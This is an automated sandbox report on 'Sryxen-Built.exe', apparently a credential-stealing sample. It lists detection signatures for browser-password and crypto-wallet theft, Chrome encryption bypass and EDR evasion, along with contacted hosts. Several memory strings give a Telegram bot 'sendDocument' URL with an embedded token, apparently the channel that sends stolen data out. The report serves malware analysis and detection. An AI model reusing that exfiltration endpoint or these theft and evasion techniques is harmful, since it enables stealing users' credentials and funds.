behaviorgraph top1 signatures2 2 Behavior Graph ID: 1632714 Sample: Sryxen-Built.exe Startdate: 09/03/2025 Architecture: WINDOWS Score: 84 72 AI detected suspicious PE digital signature 2->72 74 Joe Sandbox ML detected suspicious sample 2->74 76 Sigma detected: Potential Data Stealing Via Chromium Headless Debugging 2->76 78 Sigma detected: Suspicious Script Execution From Temp Folder 2->78 7 Sryxen-Built.exe 41 2->7         started        11 msedge.exe 71 757 2->11         started        14 msedge.exe 2->14         started        16 msedge.exe 2->16         started        process3 dnsIp4 62 127.0.0.1 unknown unknown 7->62 82 Attempt to bypass Chrome Application-Bound Encryption 7->82 84 Found many strings related to Crypto-Wallets (likely being stolen) 7->84 86 Tries to harvest and steal browser information (history, passwords, etc) 7->86 88 Found direct / indirect Syscall (likely to bypass EDR) 7->88 18 powershell.exe 7->18         started        22 chrome.exe 1 7->22         started        25 msedge.exe 16 7->25         started        35 2 other processes 7->35 64 192.168.2.13 unknown unknown 11->64 66 192.168.2.23 unknown unknown 11->66 68 239.255.255.250 unknown Reserved 11->68 50 C:\Users\user\AppData\Local\...\Login Data, SQLite 11->50 dropped 52 C:\Users\user\AppData\Local\...\History, SQLite 11->52 dropped 90 Maps a DLL or memory area into another process 11->90 27 msedge.exe 11->27         started        29 msedge.exe 11->29         started        37 4 other processes 11->37 31 msedge.exe 14->31         started        33 msedge.exe 16->33         started        file5 signatures6 process7 dnsIp8 48 C:\Users\user\...\user_SryxenRetrieved.zip, Zip 18->48 dropped 80 Loading BitLocker PowerShell Module 18->80 39 conhost.exe 18->39         started        54 192.168.2.4, 138, 443, 49205 unknown unknown 22->54 41 chrome.exe 22->41         started        44 msedge.exe 25->44         started        56 18.164.124.28, 443, 49786, 49816 MIT-GATEWAYSUS United States 27->56 58 20.110.205.119, 443, 49782, 49818 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 27->58 60 18 other IPs or domains 27->60 46 conhost.exe 35->46         started        file9 signatures10 process11 dnsIp12 70 www.google.com 142.250.186.68, 443, 49727, 49728 GOOGLEUS United States 41->70

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Sryxen-Built.exe6%VirustotalBrowse
Sryxen-Built.exe8%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://drive-daily-2.corp.google.com/0%Avira URL Cloudsafe
https://drive-daily-1.corp.google.com/0%Avira URL Cloudsafe
https://msn.comXIDv100%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    		high
    a416.dscd.akamai.net
    		2.22.242.105
    		truefalse
      		high
      a-0003.a-msedge.net
      		204.79.197.203
      		truefalse
        		high
        www.google.com
        		142.250.186.68
        		truefalse
          		high
          googlehosted.l.googleusercontent.com
          		216.58.206.33
          		truefalse
            		high
            clients2.googleusercontent.com
            		unknown
            		unknownfalse
              		high
              bzib.nelreports.net
              		unknown
              		unknownfalse
                		high
                ntp.msn.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://assets.msn.com/bundles/v1/edgeChromium/latest/common.a1e626d952b002612af0.jsfalse
                    		high
                    https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1741477972749&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                      		high
                      https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531false
                        		high
                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1741477972333&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                          		high
                          https://sb.scorecardresearch.com/b?rn=1741477966956&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=30F2568B099669BF2FA4432208F968D1&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                            		high
                            https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jsfalse
                              		high
                              https://ntp.msn.com/edge/ntp?locale=en-GB&title=New+tab&enableForceCache=truefalse
                                		high
                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1741477971735&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                  		high
                                  https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=truefalse
                                    		high
                                    https://bzib.nelreports.net/api/report?cat=bingbusinessfalse
                                      		high
                                      https://ntp.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.jsfalse
                                        		high
                                        https://assets.msn.com/statics/icons/favicon_newtabpage.pngfalse
                                          		high
                                          https://c.msn.com/c.gif?rnd=1741477966956&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f8f53d427d648059cf06719c9a45f3f&activityId=7f8f53d427d648059cf06719c9a45f3f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=8CA0B8253F8443F78B148C9D4843A7AE&MUID=30F2568B099669BF2FA4432208F968D1false
                                            		high
                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1741477966954&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                              		high
                                              https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.jsfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabWeb Data.6.drfalse
                                                  		high
                                                  https://c.msn.com/2cc80dabc69f58b6_1.6.drfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=8uliCbB.db.0.dr, Web Data.6.drfalse
                                                      		high
                                                      http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#Sryxen-Built.exefalse
                                                        		high
                                                        https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentlC:Sryxen-Built.exe, 00000000.00000002.1676255001.00000273002D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshorelinef4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                            		high
                                                            https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentcurl.exe, 00000009.00000002.1440413944.00000243B3790000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1440413944.00000243B37AE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1440413944.00000243B3798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ntp.msn.com/0000003.log.6.drfalse
                                                                		high
                                                                https://ntp.msn.com/_defaultQuotaManager.6.drfalse
                                                                  		high
                                                                  https://www.last.fm/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                    		high
                                                                    https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.6.drfalse
                                                                      		high
                                                                      https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.6.drfalse
                                                                        		high
                                                                        https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.6.drfalse
                                                                          		high
                                                                          https://deff.nelreports.net/api/reportReporting and NEL0.6.drfalse
                                                                            		high
                                                                            https://docs.google.com/manifest.json0.6.drfalse
                                                                              		high
                                                                              https://www.youtube.comf4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                		high
                                                                                https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument=bcurl.exe, 00000009.00000002.1440413944.00000243B37AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://deff.nelreports.net/api/report?cat=msnwReporting and NEL0.6.drfalse
                                                                                    		high
                                                                                    https://www.instagram.comf4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                      		high
                                                                                      https://web.skype.com/?browsername=edge_canary_shorelinef4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                        		high
                                                                                        https://drive.google.com/manifest.json0.6.drfalse
                                                                                          		high
                                                                                          https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                            		high
                                                                                            https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                              		high
                                                                                              https://www.messenger.comf4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                		high
                                                                                                https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedgef4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office.com/mail/compose?isExtension=truef4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                    		high
                                                                                                    https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.6.drfalse
                                                                                                      		high
                                                                                                      https://i.y.qq.com/n2/m/index.htmlf4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                        		high
                                                                                                        https://www.deezer.com/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                          		high
                                                                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Sryxen-Built.exefalse
                                                                                                            		high
                                                                                                            https://www.office.com/Top Sites.6.drfalse
                                                                                                              		high
                                                                                                              https://web.telegram.org/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                		high
                                                                                                                https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.6.dr, service_worker_bin_prod.js.6.drfalse
                                                                                                                  		high
                                                                                                                  https://drive-daily-2.corp.google.com/manifest.json0.6.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://drive-daily-4.corp.google.com/manifest.json0.6.drfalse
                                                                                                                    		high
                                                                                                                    https://vibe.naver.com/todayf4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                      		high
                                                                                                                      https://srtb.msn.com/2cc80dabc69f58b6_1.6.drfalse
                                                                                                                        		high
                                                                                                                        https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.6.drfalse
                                                                                                                          		high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8uliCbB.db.0.dr, Web Data.6.drfalse
                                                                                                                            		high
                                                                                                                            https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentp-AliveDaSryxen-Built.exe, 00000000.00000002.1676028553.000002730010B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://drive-daily-1.corp.google.com/manifest.json0.6.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://excel.new?from=EdgeM365Shorelinef4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                		high
                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brC6DPeS7.db.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://drive-daily-5.corp.google.com/manifest.json0.6.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.google.com/chromecontent.js.6.dr, content_new.js.6.drfalse
                                                                                                                                      		high
                                                                                                                                      https://www.tiktok.com/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                        		high
                                                                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSryxen-Built.exefalse
                                                                                                                                          		high
                                                                                                                                          https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.6.drfalse
                                                                                                                                            		high
                                                                                                                                            https://chromewebstore.google.com/manifest.json.6.drfalse
                                                                                                                                              		high
                                                                                                                                              https://drive-preprod.corp.google.com/manifest.json0.6.drfalse
                                                                                                                                                		high
                                                                                                                                                https://srtb.msn.cn/2cc80dabc69f58b6_1.6.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentateteYOSryxen-Built.exe, 00000000.00000002.1676255001.00000273002AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://msn.comXIDv10Cookies.7.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://chrome.google.com/webstore/manifest.json.6.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://y.music.163.com/m/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.6.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://bard.google.com/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.6.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://gemini.google.com/app?q=8uliCbB.db.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://browser.events.data.msn.com/2cc80dabc69f58b6_1.6.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFC6DPeS7.db.0.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://web.whatsapp.comf4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://ocsp.sectigo.com0Sryxen-Built.exefalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://m.kugou.com/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://www.office.comf4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://outlook.live.com/mail/0/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://ntp.msn.com/edge/ntp000003.log.6.dr, 2cc80dabc69f58b6_1.6.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://assets.msn.com/resolver/2cc80dabc69f58b6_1.6.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://powerpoint.new?from=EdgeM365Shorelinef4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.dr, Web Data.6.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentC:curl.exe, 00000009.00000002.1440413944.00000243B3790000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://tidal.com/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://ntp.msn.com000003.log5.6.dr, 2cc80dabc69f58b6_0.6.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument1bcurl.exe, 00000009.00000002.1440413944.00000243B37AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://browser.events.data.msn.cn/2cc80dabc69f58b6_1.6.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icoSryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0Sryxen-Built.exefalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://gaana.com/f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://drive-staging.corp.google.com/manifest.json0.6.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://outlook.live.com/mail/compose?isExtension=truef4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.dr, Web Data.6.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=truef4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://ntp.msn.com/000003.log.6.drfalse
                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                    142.250.186.68
                                                                                                                                                                                                                    		www.google.comUnited States
                                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                                    23.44.201.37
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                    2.22.242.105
                                                                                                                                                                                                                    		a416.dscd.akamai.netEuropean Union
                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                    216.58.206.33
                                                                                                                                                                                                                    		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                                    52.182.143.214
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                    162.159.61.3
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    20.110.205.119
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                    204.79.197.219
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                    23.44.201.41
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                    172.64.41.3
                                                                                                                                                                                                                    		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    23.209.72.40
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                    		unknownReserved
                                                                                                                                                                                                                    		unknownunknownfalse
                                                                                                                                                                                                                    23.44.201.6
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                    23.44.201.4
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                    23.204.152.18
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                    204.79.197.203
                                                                                                                                                                                                                    		a-0003.a-msedge.netUnited States
                                                                                                                                                                                                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                    18.164.124.28
                                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                                    		3MIT-GATEWAYSUSfalse

                                                                                                                                                                                                                    Private

                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                    192.168.2.4
                                                                                                                                                                                                                    192.168.2.23
                                                                                                                                                                                                                    192.168.2.13
                                                                                                                                                                                                                    127.0.0.1

                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                    Analysis ID:1632714
                                                                                                                                                                                                                    Start date and time:2025-03-09 00:51:09 +01:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 9m 9s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Run name:Run with higher sleep bypass
                                                                                                                                                                                                                    Number of analysed new started processes analysed:30
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:Sryxen-Built.exe
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal84.troj.spyw.evad.winEXE@77/363@16/21
                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                    • Successful, ratio: 79%
                                                                                                                                                                                                                    • Number of executed functions: 172
                                                                                                                                                                                                                    • Number of non-executed functions: 76
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 142.250.185.206, 142.250.186.35, 142.251.168.84, 13.107.42.16, 13.107.21.239, 204.79.197.239, 142.250.184.206, 13.107.6.158, 48.209.144.71, 2.19.122.48, 2.19.122.56, 2.19.122.40, 2.19.122.51, 2.19.122.42, 2.19.122.64, 2.19.122.37, 2.19.122.39, 2.19.122.38, 108.141.37.120, 84.201.210.23, 74.125.126.94, 192.178.129.94, 23.199.214.10, 20.12.23.50, 40.126.31.130, 204.79.197.222, 23.40.179.47, 13.107.246.40, 142.250.65.202, 20.194.184.156, 23.200.3.26, 150.171.27.10
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fp.msedge.net, nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, clientservices.googleapis.com, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, config.edge.skype.com, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com, b-0005.b-msedge.net, prod-atm-wds-edge.trafficmanager.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, prod-agic-we-5.westeurope.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, l-0007.config.skype.com, c.bing.com, edgeassetservice.azureedge.net, business.bing.com, clients.l.google.com, msedgeextensions.sf.tlu.dl.delivery.mp.
                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                    23:52:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                                                    23:52:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5

                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                    IPs

